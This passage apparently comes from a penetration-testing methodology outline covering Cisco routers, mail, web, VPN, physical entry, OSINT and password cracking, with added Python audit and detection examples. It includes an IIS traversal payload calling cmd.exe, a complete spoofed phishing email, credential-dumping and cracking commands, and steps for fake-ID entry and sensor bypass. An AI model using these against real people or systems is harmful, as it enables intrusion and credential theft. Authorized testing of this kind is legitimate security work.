10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

22.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>

22.5. Connecting.

22.5.1. Telnet

22.5.1.1.1. telnet <IP>

22.5.1.1.2. Sample Banners

22.5.2. SSH

22.5.3. Web Browser

22.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

22.5.3.1.2. Authentication Required
Enter username and password for "level_15_access" at http://10.1.1.1
User Name:
Password:

22.5.3.1.3. The realm name states the privilege level the credentials are checked against (level_15_access is enable level; by default the IOS HTTP server authenticates against the enable password). Once logged in you can run commands, and configure the router, through the web command interpreter.

22.5.4. TFTP

22.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

22.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

22.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

22.5.4.2.3. Creating backdoors in Cisco IOS using TCL

22.6. Known Bugs.

22.6.1. Attack Tools

22.6.1.2.1. Web browse to the Cisco device: http://<IP>

22.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

22.6.2. Common Vulnerabilities and Exposures (CVE) Information

22.6.2.1. Vulnerability and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

22.7. Configuration Files.

22.7.1.1. Configuration files explained

22.7.1.1.1. The line that reads "enable password router", where "router" is the password, sets the enable password in cleartext (or reversibly encoded as type 7 when service password-encryption is on). When an "enable secret" line is also present, the secret (type 5, MD5) is the one checked and the enable password is ignored; console and vty passwords are set separately under the "line" sections.

22.7.1.1.4. Password Encryption Utilised
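Reviewing a saved configuration for password handling, as an added Python example (not from the framework or from Nipper): type 7 "service password-encryption" is a fixed-key XOR that reverses in a few lines, whereas enable secret (type 5, MD5) does not, so the audit decodes every type 7 string, flags cleartext passwords, warns when enable password is present without enable secret, and flags guessable or read-write SNMP communities. SAMPLE_CONFIG is a constructed excerpt, not a real device's config; its two type 7 strings are the well-known vectors that both decode to cisco.

```python
import re

# Fixed key used by IOS "service password-encryption" (type 7); public for decades.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def type7_decode(encoded):
    """Reverse a type 7 string: two-digit seed, then hex of plaintext XOR key[seed+i]."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(data)).decode()

def type7_encode(plain, seed=0):
    """Forward direction, included only to show the scheme is a fixed-key XOR."""
    out = bytes(ord(c) ^ XLAT[(seed + i) % len(XLAT)] for i, c in enumerate(plain))
    return f"{seed:02d}" + out.hex().upper()

# Constructed running-config excerpt; not from a real device.
SAMPLE_CONFIG = """!
hostname edge-rtr
service password-encryption
enable password 7 0822455D0A16
!
snmp-server community public RO
snmp-server community s3cr3tRW RW
!
line vty 0 4
 password 7 05080F1C2243
 login
!
"""

def audit_config(text):
    """Return reviewer findings derived from the config text alone."""
    findings = []
    lines = [l.rstrip() for l in text.splitlines()]
    has_secret = any(l.startswith("enable secret") for l in lines)
    if not has_secret and any(l.startswith("enable password") for l in lines):
        findings.append("enable password set without enable secret: the reversible one is in use")
    for line in lines:
        s = line.strip()
        m = re.match(r"(?:enable )?password 7 ([0-9A-Fa-f]+)$", s)
        if m:
            findings.append(f"type 7 recovered: {m.group(1)} -> {type7_decode(m.group(1))}")
            continue
        m = re.match(r"(?:enable )?password (?:0 )?(\S+)$", s)   # no type marker: cleartext
        if m:
            findings.append(f"cleartext password: {m.group(1)}")
            continue
        m = re.match(r"snmp-server community (\S+) (RO|RW)", s)
        if m:
            community, mode = m.groups()
            if community.lower() in ("public", "private") or mode == "RW":
                findings.append(f"SNMP community {community} ({mode}) guessable or writable")
    return findings

if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

A read-write community is equivalent to the enable password for anyone who can reach UDP 161, since it allows the running-config to be copied out (and a new one copied in) over TFTP, which is the route the SNMP section above describes.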

22.7.1.2. Configuration Testing Tools

22.7.1.2.1. Nipper

22.7.1.2.2. fwauto (Beta)

22.8. References.

22.8.1. Cisco IOS Exploitation Techniques

23. Server Specific Tests

23.1. Databases

23.1.1. Direct Access Interrogation

23.1.1.1. MS SQL Server

23.1.1.1.1. Ports

23.1.1.1.2. Version

23.1.1.1.3. osql

23.1.1.2. Oracle

23.1.1.2.1. Ports

23.1.1.2.2. TNS Listener

23.1.1.2.3. SQL Plus

23.1.1.2.4. Default Account/Passwords

23.1.1.2.5. Default SID's

23.1.1.3. MySQL

23.1.1.3.1. Ports

23.1.1.3.2. Version

23.1.1.3.3. Users/Passwords

23.1.1.4. DB2

23.1.1.5. Informix

23.1.1.6. Sybase

23.1.1.7. Other

23.1.2. Scans

23.1.2.1. Default Ports

23.1.2.2. Non-Default Ports

23.1.2.3. Instance Names

23.1.2.4. Versions

23.1.3. Password Attacks

23.1.3.1. Sniffed Passwords

23.1.3.1.1. Cracked Passwords

23.1.3.1.2. Hashes

23.1.3.2. Direct Access Guesses

23.1.4. Vulnerability Assessment

23.1.4.1. Automated

23.1.4.1.1. Reports

23.1.4.1.2. Vulnerabilities

23.1.4.2. Manual

23.1.4.2.1. Patch Levels

23.1.4.2.2. Confirmed Vulnerabilities

23.2. Mail

23.2.1. Scans

23.2.2. Fingerprint

23.2.2.1. Manual

23.2.2.2. Automated

23.2.3. Spoofable

23.2.3.1. Telnet spoof

23.2.3.1.1. telnet target_IP 25
helo target.com
mail from: XXXX@XXX.com
rcpt to: administrator@target.com
data
X-Sender: XXXX@XXX.com
X-Originating-IP: [192.168.1.1]
X-Originating-Email: [XXXX@XXX.com]
MIME-Version: 1.0
To: <administrator@target.com>
From: < XXXX@XXX.com >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory; we have done this to increase the security of the network against hacker attacks and to protect your private information. Due to this, you are required to log on to the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target Ltd
XXXX@XXX.com
.

23.2.4. Relays
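The first half of the telnet session above, driven from Python as an added example (not part of the framework): it walks HELO, MAIL FROM and RCPT TO for a recipient outside the target's domain and reads the RCPT reply, which is the open-relay test; it stops before DATA, so nothing is delivered. ScriptedServer and the two reply lists are constructed stand-ins for a mail server so the logic runs offline; relay_test_host() runs the same dialogue against a live host.

```python
import socket

def read_reply(conn):
    """Read one SMTP reply (multi-line replies use 'NNN-' continuation lines); return (code, text)."""
    buf = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("server closed connection")
        buf += chunk
        lines = buf.split(b"\r\n")
        # complete when the last full line has a space, not '-', after the 3-digit code
        if len(lines) >= 2 and len(lines[-2]) >= 4 and lines[-2][3:4] == b" ":
            break
    text = buf.decode(errors="replace")
    return int(text[:3]), text

def cmd(conn, line):
    conn.sendall(line.encode() + b"\r\n")
    return read_reply(conn)

def relay_test(conn, helo_name, mail_from, rcpt_to):
    """HELO/MAIL FROM/RCPT TO for an external recipient; 250/251 on RCPT means the host relays."""
    code, banner = read_reply(conn)
    if code != 220:
        return {"relay": False, "stage": "banner", "code": code}
    code, _ = cmd(conn, f"HELO {helo_name}")
    if code != 250:
        return {"relay": False, "stage": "helo", "code": code}
    code, _ = cmd(conn, f"MAIL FROM:<{mail_from}>")
    if code != 250:
        return {"relay": False, "stage": "mail", "code": code}
    code, _ = cmd(conn, f"RCPT TO:<{rcpt_to}>")
    cmd(conn, "RSET")          # abandon the transaction: no DATA, nothing is sent
    cmd(conn, "QUIT")
    return {"relay": code in (250, 251), "stage": "rcpt", "code": code,
            "banner": banner.strip()}

def relay_test_host(host, port=25, **kw):
    """Run relay_test against a real server (hostname and recipients are the caller's)."""
    with socket.create_connection((host, port), timeout=10) as s:
        return relay_test(s, **kw)

class ScriptedServer:
    """Constructed stand-in for a mail server: replies in order, records what the client sent."""
    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = []
    def sendall(self, data):
        self.sent.append(data.decode().strip())
    def recv(self, n):
        return self.replies.pop(0) if self.replies else b""

# Constructed reply sequences (banner, HELO, MAIL, RCPT, RSET, QUIT); not captures.
OPEN_RELAY = [b"220 mail.example.test ESMTP\r\n", b"250 mail.example.test\r\n",
              b"250 2.1.0 Ok\r\n", b"250 2.1.5 Ok\r\n",
              b"250 2.0.0 Ok\r\n", b"221 2.0.0 Bye\r\n"]
CLOSED_RELAY = [b"220 mail.example.test ESMTP\r\n", b"250 mail.example.test\r\n",
                b"250 2.1.0 Ok\r\n", b"554 5.7.1 <victim@elsewhere.test>: Relay access denied\r\n",
                b"250 2.0.0 Ok\r\n", b"221 2.0.0 Bye\r\n"]

if __name__ == "__main__":
    for name, script in (("open", OPEN_RELAY), ("closed", CLOSED_RELAY)):
        srv = ScriptedServer(script)
        print(name, relay_test(srv, "probe.test", "probe@probe.test", "victim@elsewhere.test"))
```

Some servers accept RCPT TO for anything and only reject at DATA or after queueing, so a 250 here is a strong indicator rather than proof; confirm with a single message to an address you control.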

23.3. VPN

23.3.1. Scanning

23.3.1.1. 500 UDP IPSEC

23.3.1.2. 1723 TCP PPTP

23.3.1.3. 443 TCP/SSL

23.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

23.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

23.3.2. Fingerprinting

23.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

23.3.3. PSK Crack

23.3.3.1. ikeprobe 80.75.68.27

23.3.3.2. sniff for responses with C&A or ikecrack

23.4. Web

23.4.1. Vulnerability Assessment

23.4.1.1. Automated

23.4.1.1.1. Reports

23.4.1.1.2. Vulnerabilities

23.4.1.2. Manual

23.4.1.2.1. Patch Levels

23.4.1.2.2. Confirmed Vulnerabilities

23.4.2. Permissions

23.4.2.1. PUT /test.txt HTTP/1.0

23.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

23.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6

23.4.3. Scans

23.4.4. Fingerprinting

23.4.4.1. Other

23.4.4.2. HTTP

23.4.4.2.1. Commands

23.4.4.2.2. Modules

23.4.4.2.3. File Extensions

23.4.4.3. HTTPS

23.4.4.3.1. Commands

23.4.4.3.2. Commands

23.4.4.3.3. File Extensions

23.4.5. Directory Traversal

23.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
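Detecting the traversal above on the defensive side, as an added Python example (not part of the framework): the request path is decoded repeatedly (%255c is a double-encoded backslash), the overlong UTF-8 forms from the IIS Unicode bug (%c0%af) are mapped to the separator they resolve to, and the result is walked segment by segment to see whether it climbs above the web root. SAMPLE_REQUESTS are constructed request lines, not log data.

```python
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 sequences that IIS once decoded to a path separator (the "Unicode" bug).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\xae": b"."}

def decode_once(s):
    """One round of percent-decoding, with overlong sequences mapped to what they decode to."""
    if "%" not in s:
        return s
    raw = unquote_to_bytes(s)
    for bad, good in OVERLONG.items():
        raw = raw.replace(bad, good)
    return raw.decode("latin-1")

def normalise_path(path, max_rounds=4):
    """Decode until stable (covers %255c, a double-encoded backslash) and unify separators."""
    for _ in range(max_rounds):
        decoded = decode_once(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def is_traversal(request_line):
    """True if the request path, after normalisation, climbs above the web root."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return False
    path = target.split("?", 1)[0]
    depth = 0
    for seg in normalise_path(path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def flag_requests(request_lines):
    return [r for r in request_lines if is_traversal(r)]

# Constructed request lines; not from a real log.
SAMPLE_REQUESTS = [
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /images/logo.png HTTP/1.1",
    "GET /docs/..%2F..%2Fetc%2Fpasswd HTTP/1.1",
    "GET /search?q=a..b HTTP/1.1",
]

if __name__ == "__main__":
    for line in flag_requests(SAMPLE_REQUESTS):
        print("traversal:", line, "->", normalise_path(line.split(" ", 2)[1].split("?")[0]))
```

Matching on the literal string "..%255c" is what signature-based filters did and why the double-encoded form got through; decoding to a fixed point and reasoning about the resulting path is the check that survives new encodings.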

24. http://secunia.com/advisories/search/?search=citrix

25. Physical Security

25.1. Building Security

25.1.1. Meeting Rooms

25.1.1.1. Check for active network jacks.

25.1.1.2. Check for any information in room.

25.1.2. Lobby

25.1.2.1. Check for active network jacks.

25.1.2.2. Does receptionist/guard leave lobby?

25.1.2.3. Accessible printers? Print test page.

25.1.2.4. Obtain phone/personnel listing.

25.1.3. Communal Areas

25.1.3.1. Check for active network jacks.

25.1.3.2. Check for any information in room.

25.1.3.3. Listen for employee conversations.

25.1.4. Room Security

25.1.4.1. Resistance of lock to picking.

25.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

25.1.4.2. Ceiling access areas.

25.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

25.1.5. Windows

25.1.5.1. Check windows/doors for visible intruder alarm sensors.

25.1.5.2. Check visible areas for sensitive information.

25.1.5.3. Can you video users logging on?

25.2. Perimeter Security

25.2.1. Fence Security

25.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

25.2.2. Exterior Doors

25.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

25.2.3. Guards

25.2.3.1. Patrol Routines

25.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

25.2.3.2. Communications

25.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

25.3. Entry Points

25.3.1. Guarded Doors

25.3.1.1. Piggybacking

25.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

25.3.1.2. Fake ID

25.3.1.2.1. Attempt to use fake ID to gain access.

25.3.1.3. Access Methods

25.3.1.3.1. Test 'out of hours' entry methods

25.3.2. Unguarded Doors

25.3.2.1. Identify all unguarded entry points.

25.3.2.1.1. Are doors secured?

25.3.2.1.2. Check locks for resistance to lock picking.

25.3.3. Windows

25.3.3.1. Check windows/doors for visible intruder alarm sensors.

25.3.3.1.1. Attempt to bypass sensors.

25.4. Office Waste

25.4.1. Dumpster Diving - Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.

26. Final Report - template

27. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms, i.e. active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and the other forms of protection afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser, visiting newsgroups etc. An active form would be more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

27.1. Untitled

27.1.1. Authoritative Bodies

27.1.1.1. IANA - Internet Assigned Numbers Authority

27.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

27.1.1.3. NRO - Number Resource Organisation

27.1.1.4. RIR - Regional Internet Registry

27.1.1.4.1. AFRINIC - African Network Information Centre

27.1.1.4.2. APNIC - Asia Pacific Network Information Centre

27.1.1.4.3. ARIN - American Registry for Internet Numbers

27.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

27.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre

27.1.2. Websites

27.1.2.1. Central Ops

27.1.2.1.1. Domain Dossier

27.1.2.1.2. Email Dossier

27.1.2.2. DNS Stuff

27.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

27.1.2.3. Fixed Orbit

27.1.2.3.1. Autonomous System lookups and other online tools available.

27.1.2.4. Geektools

27.1.2.5. IP2Location

27.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

27.1.2.6. Kartoo

27.1.2.6.1. Metasearch engine that visually presents its results.

27.1.2.7. MyIPNeighbors.com

27.1.2.7.1. Excellent site that gives you details of the domains sharing the IP queried and, conversely, IP to DNS resolution.

27.1.2.8. My-IP-Neighbors.com

27.1.2.8.1. Excellent site that can be used if the above is down.

27.1.2.9. myipneighbors.net

27.1.2.10. Netcraft

27.1.2.10.1. Online search tool allowing queries for host information.

27.1.2.11. Passive DNS Replication

27.1.2.11.1. Finds shared domains based on supplied IP addresses.

27.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

27.1.2.12. Robtex

27.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed, with a graphical display of the results showing pointers, A and MX records and AS connectivity.

27.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

27.1.2.13. Traceroute.org

27.1.2.13.1. Website listing a large number of links to online traceroute resources.

27.1.2.14. Wayback Machine

27.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

27.1.2.15. Whois.net

27.1.3. Tools

27.1.3.1. Cheops-ng

27.1.3.2. Country whois

27.1.3.3. Domain Research Tool

27.1.3.4. Firefox Plugins

27.1.3.4.1. AS Number

27.1.3.4.2. Shazou

27.1.3.4.3. Firecat Suite

27.1.3.5. Gnetutil

27.1.3.6. Goolag Scanner

27.1.3.7. Greenwich

27.1.3.8. Maltego

27.1.3.9. GTWhois

27.1.3.10. Sam Spade

27.1.3.11. Smart whois

27.1.3.12. SpiderFoot

27.2. Internet Search

27.2.1. General Information

27.2.1.1. Web Investigator

27.2.1.2. Tracesmart

27.2.1.3. Friends Reunited

27.2.1.4. Ebay - profiles etc.

27.2.2. Financial

27.2.2.1. EDGAR - Company information, including real-time filings. US

27.2.2.2. Google Finance - General Finance Portal

27.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

27.2.2.4. Companies House UK

27.2.2.5. Land Registry UK

27.2.3. Phone book/ Electoral Roll Information

27.2.3.1. 123people

27.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

27.2.3.2. 192.com

27.2.3.2.1. Electoral Roll Search. UK

27.2.3.3. 411

27.2.3.3.1. Online White Pages and Yellow Pages. US

27.2.3.4. Untitled

27.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

27.2.3.5. BT.com. UK

27.2.3.5.1. Residential

27.2.3.5.2. Business

27.2.3.6. Pipl

27.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

27.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

27.2.3.7. Spokeo

27.2.3.7.1. http://www.spokeo.com/user?q=domain_name

27.2.3.7.2. http://www.spokeo.com/user?q=email_address

27.2.3.8. Yasni

27.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

27.2.3.9. Zabasearch

27.2.3.9.1. People Search Engine. US

27.2.4. Generic Web Searching

27.2.4.1. Code Search

27.2.4.2. Forum Entries

27.2.4.3. Google Hacking Database

27.2.4.4. Google

27.2.4.4.1. Email Addresses

27.2.4.4.2. Contact Details

27.2.4.5. Newsgroups/forums

27.2.4.6. Blog Search

27.2.4.6.1. Yammer

27.2.4.6.2. Google Blog Search

27.2.4.6.3. Technorati

27.2.4.6.4. Jaiku

27.2.4.6.5. Present.ly

27.2.4.6.6. Twitter Network Browser

27.2.4.7. Search Engine Comparison/ Aggregator Sites

27.2.4.7.1. Clusty

27.2.4.7.2. Grokker

27.2.4.7.3. Zuula

27.2.4.7.4. Exalead

27.2.4.7.5. Delicious

27.2.5. Metadata Search

27.2.5.1. Untitled

27.2.5.1.1. MetaData Visualisation Sites

27.2.5.1.2. Tools

27.2.5.1.3. Wikipedia Metadata Search

27.2.6. Social/ Business Networks

27.2.6.1. Untitled

27.2.6.1.1. Africa

27.2.6.1.2. Australia

27.2.6.1.3. Belgium

27.2.6.1.4. Holland

27.2.6.1.5. Hungary

27.2.6.1.6. Iran

27.2.6.1.7. Japan

27.2.6.1.8. Korea

27.2.6.1.9. Poland

27.2.6.1.10. Russia

27.2.6.1.11. Sweden

27.2.6.1.12. UK

27.2.6.1.13. US

27.2.6.1.14. Assorted

27.2.7. Resources

27.2.7.1. OSINT

27.2.7.2. International Directory of Search Engines

27.3. DNS Record Retrieval from publicly available servers

27.3.1. Types of Information Records

27.3.1.1. SOA Records - Start of Authority; indicates the primary server that has authority for the domain and carries the zone's serial and timer values.

27.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

27.3.1.3. NS Records - List of a host’s or domain’s name server(s).

27.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

27.3.1.5. PTR Records - Reverse lookup record; maps an IP address back to the domain name of the host that uses it.

27.3.1.6. SRV Records - Service location record.

27.3.1.7. HINFO Records - Host information record with CPU type and operating system.

27.3.1.8. TXT Records - Generic text record.

27.3.1.9. CNAME - Canonical name record; allows additional names/ aliases to point at a host's canonical name.

27.3.1.10. RP - Responsible person for the domain.

27.3.2. Database Settings

27.3.2.1. Version.bind

27.3.2.2. Serial

27.3.2.3. Refresh

27.3.2.4. Retry

27.3.2.5. Expiry

27.3.2.6. Minimum

27.3.3. Sub Domains

27.3.4. Internal IP ranges

27.3.4.1. Reverse DNS for IP Range

27.3.5. Zone Transfer

27.4. Social Engineering

27.4.1. Remote

27.4.1.1. Phone

27.4.1.1.1. Scenarios

27.4.1.1.2. Results

27.4.1.1.3. Contact Details

27.4.1.2. Email

27.4.1.2.1. Scenarios

27.4.1.2.2. Software

27.4.1.2.3. Results

27.4.1.2.4. Contact Details

27.4.1.3. Other

27.4.2. Local

27.4.2.1. Personas

27.4.2.1.1. Name

27.4.2.1.2. Phone

27.4.2.1.3. Email

27.4.2.1.4. Business Cards

27.4.2.2. Contact Details

27.4.2.2.1. Name

27.4.2.2.2. Phone number

27.4.2.2.3. Email

27.4.2.2.4. Room number

27.4.2.2.5. Department

27.4.2.2.6. Role

27.4.2.3. Scenarios

27.4.2.3.1. New IT employee

27.4.2.3.2. Fire Inspector

27.4.2.4. Results

27.4.2.5. Maps

27.4.2.5.1. Satellite Imagery

27.4.2.5.2. Building layouts

27.4.2.6. Other

27.5. Dumpster Diving

27.5.1. Rubbish Bins

27.5.2. Contract Waste Removal

27.5.3. Ebay ex-stock sales i.e. HDD

27.6. Web Site copy

27.6.1. httrack

27.6.2. teleport pro

27.6.3. Black Widow

28. Password cracking

28.1. Rainbow crack

28.1.1. ophcrack

28.1.2. rainbow tables

28.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

28.2. Ophcrack

28.3. Cain & Abel

28.4. John the Ripper

28.4.1. ./unshadow passwd shadow > file_to_crack

28.4.2. ./john -single file_to_crack

28.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

28.4.4. ./john -show file_to_crack

28.4.5. ./john --incremental:All file_to_crack

28.5. fgdump

28.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

28.6. pwdump6

28.7. medusa

28.8. LCP

28.9. L0phtcrack (Note: - This tool was acquired by Symantec from @Stake and it is their policy not to ship it outside the USA and Canada.)

28.9.1. Domain credentials

28.9.2. Sniffing

28.9.3. pwdump import

28.9.4. sam import

28.10. aiocracker

28.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list